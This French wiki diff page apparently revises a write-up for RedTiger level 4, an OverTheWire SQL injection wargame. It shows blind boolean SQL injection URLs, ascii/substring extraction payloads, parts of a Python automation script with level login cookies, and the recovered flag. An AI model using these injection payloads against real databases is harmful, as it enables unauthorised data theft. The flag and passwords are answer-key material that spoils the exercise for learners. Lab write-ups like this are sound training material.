Outils d'utilisateurs

Outils du Site


redtiger_level4

Différences

Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.

Lien vers cette vue

redtiger_level4 [2015/06/21 20:02]
Geographer créée
redtiger_level4 [2018/04/02 11:12] (Version actuelle)
Z0vsky petit fix dans le script et maj du flag
Ligne 13: Ligne 13:
 > TRUE > TRUE
 .... ....
-http://redtiger.labs.overthewire.org/level4.php?id=1 and (select LENGTH(keyword) from level4_secret LIMIT 1)>16--+http://redtiger.labs.overthewire.org/level4.php?id=1 and (select LENGTH(keyword) from level4_secret LIMIT 1)>19--
 > TRUE > TRUE
-http://redtiger.labs.overthewire.org/level4.php?id=1 and (select LENGTH(keyword) from level4_secret LIMIT 1)>17--+http://redtiger.labs.overthewire.org/level4.php?id=1 and (select LENGTH(keyword) from level4_secret LIMIT 1)>20--
 > FALSE > FALSE
 </code> </code>
  
-Notre payload nous informe donc que la clé a pour longueur 17 caractères.+Notre payload nous informe donc que la clé a pour longueur 20 caractères.
  
 Nous allons maintenant utiliser la même méthode mais pour en extraire les informations. Pour ce faire, nous utiliserons les commandes MySQL ascii et substring qui permettent respectivement de retourner le code ascii d'un caractère et de retourner le(s) caractère(s) à une position précise en fonction de ses paramètres. Nous utiliserons le payload suivant pour extraire les codes ascii des lettres de la chaîne en question. Dans cet exemple, nous proposons la condition suivante : Et si le premier caractère du premier élément de la table \level4\_secret a un code ASCII supérieur à 97 (Nb: 97 correspondant au caractère a). Nous allons maintenant utiliser la même méthode mais pour en extraire les informations. Pour ce faire, nous utiliserons les commandes MySQL ascii et substring qui permettent respectivement de retourner le code ascii d'un caractère et de retourner le(s) caractère(s) à une position précise en fonction de ses paramètres. Nous utiliserons le payload suivant pour extraire les codes ascii des lettres de la chaîne en question. Dans cet exemple, nous proposons la condition suivante : Et si le premier caractère du premier élément de la table \level4\_secret a un code ASCII supérieur à 97 (Nb: 97 correspondant au caractère a).
Ligne 28: Ligne 28:
 .... ....
 http://redtiger.labs.overthewire.org/level4.php?id=1 and ascii(substring((SELECT keyword from level4_secret limit 0,1),1,1))>97-- http://redtiger.labs.overthewire.org/level4.php?id=1 and ascii(substring((SELECT keyword from level4_secret limit 0,1),1,1))>97--
 +>TRUE
 +....
 +http://redtiger.labs.overthewire.org/level4.php?id=1 and ascii(substring((SELECT keyword from level4_secret limit 0,1),1,1))>106--
 > TRUE > TRUE
-http://redtiger.labs.overthewire.org/level4.php?id=1 and ascii(substring((SELECT keyword from level4_secret limit 0,1),1,1))>98--+http://redtiger.labs.overthewire.org/level4.php?id=1 and ascii(substring((SELECT keyword from level4_secret limit 0,1),1,1))>107--
 > FALSE > FALSE
 </code> </code>
  
-Nous en déduisons donc que le premier caractère est la lettre (98). Afin d'automatiser cette longue exploitation nous avons scripter un programme en python pour faire le travail à notre place; voici le code source:+Le code ASCII est incrémenté jusqu'à ce qu'un changement dans le nombre de lignes renvoyé est indiqué. 
 +Nous en déduisons donc que le premier caractère est la lettre (107). Afin d'automatiser cette longue exploitation nous avons scripter un programme en python pour faire le travail à notre place; voici le code source:
  
 <code> <code>
Ligne 51: Ligne 55:
 """ """
 def getLength(): def getLength():
- cookies = dict(level4login='dont_publish_solutions_GRR%21')+ cookies = 
 + 'level3login':'feed_your_cat_before_your_cat_feeds_you', 
 + 'level2login':'4_is_not_random', 
 + 'level4login':'there_is_no_bug' 
 + }
  for i in range(16,40):  for i in range(16,40):
  parametres = {'id': '1 and if((select length(keyword))>'+str(i)+',1,0)-- '}  parametres = {'id': '1 and if((select length(keyword))>'+str(i)+',1,0)-- '}
Ligne 87: Ligne 95:
 </code> </code>
  
-Ce script nous a testé toutes les conditions permettant de retrouver le flag : blindinjection123.+Ce script nous a testé toutes les conditions permettant de retrouver le flag : <del>blindinjection123</del> ''killstickswithbr1cks!''.
redtiger_level4.1434909727.txt.gz · Dernière modification: 2017/04/09 15:33 (modification externe)